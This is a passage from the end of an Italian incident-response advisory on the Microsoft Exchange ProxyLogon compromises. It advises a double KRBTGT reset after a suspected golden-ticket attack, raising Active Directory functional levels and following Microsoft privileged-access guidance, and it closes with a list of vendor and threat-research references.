possesso di un “golden ticket” (ovvero della possibilità di impersonificare qualsiasi account, ed accedere a
qualsiasi risorsa) si dovrà procedere alla predisposizione di un piano di risposta che preveda il doppio reset
dell’account KRBTGT effettuato in totale disconnessione dalla rete Internet di tutte le postazioni di lavoro e
server.
Tale attività può anche essere effettuata nelle prime fasi della risposta ed a seguito della messa in
esercizio/potenziamento delle capacità di monitoraggio specifico, senza operare la totale disconnessione dalla
26
Nonostante Microsoft consigli un nuovo modello di sicurezza specifico per ambienti ibridi, il modello indicato resta valido
in caso di infrastrutture Active Directory tradizionali (https://docs.microsoft.com/en-us/security/compass/esae-
retirement)
14 di 16rete Internet, al fine di costringere l’attaccante ad effettuare le operazioni necessarie a riottenere permessi
amministrativi sull’infrastruttura ed avere quindi la possibilità di rilevare la tecnica utilizzata e le postazioni
sicuramente compromesse da cui parte l’attività. È importante segnalare che la suddetta manovra può
comportare disservizi sulle autenticazioni utente e sulla funzionalità dei servizi pertanto necessita di
un’accurata pianificazione anche nell’ottica di evitare che l’attaccante abbia a disposizione dei sistemi di
persistenza non rilevati e possa attraverso questi riprendere le attività.
Si consiglia, ove possibile, di innalzare il livello funzionale dei domini Active Directory alla versione 201627
(facendo attenzione al rispetto dei requisiti in termini di sistema operativo utilizzato per i domain controller e
al rispetto del sistema operativo minimo per le postazioni inserite all’interno del dominio). In tale maniera sarà
possibile beneficiare delle nuove funzionalità di protezione delle credenziali28 introdotte dal suddetto livello
funzionale.
Per i gestori di infrastrutture basate su prodotti Microsoft si consiglia inoltre di valutare quanto riportato nelle
best practices rilasciate dallo stesso e disponibili al link:
- https://docs.microsoft.com/en-us/security/compass/compass
in particolate nella sezione denominata “Privileged administration”.
27
https://docs.microsoft.com/it-it/windows-server/identity/ad-ds/active-directory-functional-levels
28
https://docs.microsoft.com/it-it/windows-server/security/credentials-protection-and-management/whats-new-in-
credential-protection
15 di 16FONTI E RIFERIMENTI
- https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-
vulnerabilities/
- https://proxylogon.com/
- https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
- https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072b
- https://docs.microsoft.com/en-us/powershell/module/exchange/set-oabvirtualdirectory?view=exchange-
ps#parameters
- https://attack.mitre.org/techniques/enterprise/
- https://www.microsoft.com/en-us/download/details.aspx?id=36036
- https://github.com/microsoft/CSS-Exchange/tree/main/Security
- https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-
2003/cc772829(v=ws.10)?redirectedfrom=MSDN
- https://github.com/microsoft/CSS-Exchange/tree/main/Security#system-requirements
- https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download
- https://support.microsoft.com/kb/2520970
- https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-
2010-service-pack-3-march-2-2021-kb5000978-894f27bf-281e-44f8-b9ba-dad705534459
- https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-
2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b
- https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-
2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b
- https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-
2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b
- https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-
older-cumulative/ba-p/2192020
- https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-
in-microsoft-defender-antivirus/
- https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/
- https://docs.microsoft.com/it-it/windows-server/identity/ad-ds/active-directory-functional-levels
- https://docs.microsoft.com/it-it/windows-server/security/credentials-protection-and-management/whats-new-in-
credential-protection
- https://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating-Pass-
the-Hash-Attacks-and-Other-Credential-Theft-Version-2.pdf
- https://www.microsoft.com/en-us/download/details.aspx?id=46899
- https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-
server-vulnerabilities/
- https://docs.microsoft.com/en-us/security/compass/compass
16 di 16Puoi anche leggere
